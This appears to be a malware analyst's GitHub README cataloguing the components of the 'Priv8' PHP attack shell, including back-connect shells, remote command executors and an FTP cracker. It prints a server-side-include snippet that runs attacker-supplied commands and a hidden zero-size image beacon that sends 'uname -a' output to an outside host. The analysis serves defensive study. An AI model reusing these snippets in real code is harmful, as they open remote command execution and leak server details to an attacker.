Skip to content

Latest commit

 

History

History

internal_code

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
Ph33r
Ph33r
 
 
cgirun
cgirun
 
 
cgitelnet1
cgitelnet1
 
 
configler
configler
 
 
litespeed
litespeed
 
 
perltools
perltools
 
 
python
python
 
 
safeof
safeof
 
 
ssim
ssim
 
 
README.md
README.md
 
 
conp
conp
 
 
create_cgirun.php
create_cgirun.php
 
 
create_configler.php
create_configler.php
 
 
create_conp.php
create_conp.php
 
 
create_dayi.php
create_dayi.php
 
 
create_dc.php
create_dc.php
 
 
create_ftpcrack.php
create_ftpcrack.php
 
 
create_litespeed.php
create_litespeed.php
 
 
create_perltools.php
create_perltools.php
 
 
create_ph33r.php
create_ph33r.php
 
 
create_priv9.php
create_priv9.php
 
 
create_pss.php
create_pss.php
 
 
create_python_izo.php
create_python_izo.php
 
 
create_safe.php
create_safe.php
 
 
create_showsourceread.php
create_showsourceread.php
 
 
create_ssi.php
create_ssi.php
 
 
create_suexec.php
create_suexec.php
 
 
dayi
dayi
 
 
ftpcrack.php
ftpcrack.php
 
 
priv9
priv9
 
 

README.md

Code Carried Internally by Priv8 Attack Shell

This is just a mutated version of "webroot" hacking package. The weird style of carrying entire programs in base64, gzipped strings, writing them out and executing is common to both. Many of the programs so executed are common to both "webroot" and this package, or are very similar.

  • Ph33r/Ph33r.php - PHP, simple cURL based proxy.
  • cgirun/cgi.pr - Perl, remote command execution
  • cgitelnet1/dc.pl, Perl, "Data Cha0s Connect Back Backdoor", back shell to port 80 on arbitrary host.
  • cgitelnet1/izo.cin, Perl, same as web.root from kinked activex theme
  • configler/config.izo, Perl, same as config.root from kinked activex theme
  • litespeed/ssi.php - PHP, same as litebypass.php from the kinked activex theme.
  • perltools/perlbypass.php, PHP, but incorrect syntax. Too goofed up to figure out.
  • python/python.izo, Python, "A simple CGI that executes arbitrary shell commands." Dated 07-07-04
  • safeof/safe.php, PHP, "Command shell", gaudy PHP exec of two POST parameters
  • ssim/pss_v.1.0_min.shtml, looks like a little recon via pre-processed HTML. Contains things like <!--#exec cmd="whoami"-->.
  • conp - Python, simple back shell, configurable host and port that it connects back to.
  • dayi - Perl, "simple back connect", somewhat similar to cgitelnet1/dc.pl
  • ftpcrack.php - PHP, "Cpanel , FTP CraCkeR", brute force (totally random passwords generated) Cpanel and FTP guesser. I'd be surprised if this ever found a password.
  • priv9 - Python, another back shell, different from conp.

litespeed/ssi.php

This is a mutated version of litebypass.php, another Webrootv3 file. ssi.php from this package has a section like this:

<?php
$command = $_POST['command'];
$z00z = $_POST['z00z'];
if($command){
$z11d = "<center><pre><pre>
<br>
Redsecurity.iblogger.org
<br>
<br>
<!--#exec cmd='$command' --> 

";
$openfile = fopen("izo.shtml","w");
$writeinto = fwrite($openfile,"$z11d");
fclose($openfile);
if($openfile){
}else{
}
}

litebypass.php from kinked activex theme hs an almost identical section:

<?php
$command = $_POST['command'];
$l00l = $_POST['l00l'];
if($command){
$z11d = "<center><pre><pre>
<br>
<!--#exec cmd='$command' --> 

";
$openfile = fopen("web.shtml","w");
$writeinto = fwrite($openfile,"$z11d");
fclose($openfile);
if($openfile){
}else{
}
}

It has the same 0x0 "img" web bug that the main PHP file, izocin.php had:

<img border="0" src="http://priv8.iblogger.org/s.php?'+<?echo "uname -a : "; echo (php_uname())?>";" width="0" height="0">